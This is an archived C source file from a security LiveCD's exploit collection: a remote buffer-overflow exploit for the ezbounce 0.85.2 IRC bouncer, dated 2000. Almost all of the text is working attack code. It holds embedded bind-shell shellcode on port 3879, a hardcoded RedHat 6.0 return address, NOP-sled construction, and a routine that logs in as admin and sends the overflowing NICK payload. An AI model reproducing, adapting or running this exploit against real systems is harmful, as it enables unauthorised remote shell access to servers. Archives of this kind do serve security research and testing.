Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / irc / bnc / bnc-ezbounce.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3KB | 123 lines

/* ezbounce version (0.85.2 and probably others) exploit by sectorx * mad thanks to duke for helping me with the segment probe code :) * I included the offset of RedHat 6.0's RPM, feel free to report me of * any other offsets of precompiled binaries. * * PRIVATE! DO NOT DISTRIBUTE!! */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <fcntl.h> #include <stdarg.h> #include <time.h> #include <sys/time.h> #define MAX 4096 #define TIMEOUT 1 #define SIZE 400 #define TOP 310 #define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */ /* bind a shell on port 3879 by lamagra */ char shellcode[]= "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; int Connect(int ip, int port) { int fd; struct sockaddr_in a; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (fd<0) return -1; a.sin_family = AF_INET; a.sin_port = htons(port); a.sin_addr.s_addr = ip; if (connect(fd,(struct sockaddr*)&a,sizeof(struct sockaddr))<0) return -1; return fd; } int sprint(int fd, const char *str, ...) { va_list args; char buf[MAX]; va_start(args,str); vsnprintf(buf,MAX,str,args); printf("-> %s",buf); return(write(fd,buf,strlen(buf))); } int Datawatch(int fd, int sec) { fd_set fds; struct timeval tv; tv.tv_sec = sec; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(fd,&fds); if (select(fd+1,&fds,NULL,NULL,&tv)) return 1; return 0; } int Get(int fd, char *grep) { char buf[MAX]; int ret=0; while (Datawatch(fd,TIMEOUT)>0) { memset(&buf,0,sizeof(buf)); read(fd,&buf,sizeof(buf)); if (strstr(buf,grep)) ++ret; } return ret; } int main(int argc, char *argv[]) { int i,fd; char buf[SIZE]; printf("ezbounce remote exploit by sectorx of xor\n"); if (argc<6) { printf("Usage: %s <ip> <port> <password> <admin username> <admin password>\n\n",argv[0]); return; } memset(&buf,0x90,sizeof(buf)); for (i=TOP+2;i<SIZE-4;i+=4) *(long*)&buf[i] = ADDR; memcpy(buf+(TOP-sizeof(shellcode)-1),shellcode,sizeof(shellcode)); buf[TOP-2] = 0x90; buf[SIZE-1] = '\0'; fd = Connect(inet_addr(argv[1]),atoi(argv[2])); if (fd<0) { perror("Connect "); return; } sprint(fd,"USER xor\n"); sprint(fd,"NICK %s\n",buf); sprint(fd,"PASS %s\n",argv[3]); Get(fd,"NOTICE"); sprint(fd,"ADMIN %s %s\n",argv[4],argv[5]); if (Get(fd,"granted")==0) { printf("** Error: i was unable to gain administrative privilages using provided l/p\naborting.\n"); goto end; } sprint(fd,"WRITE all a\n"); printf("Code sent! telnet to port 3879 for shell\n"); end: ; close(fd); } /* www.hack.co.za [28 September 2000]*/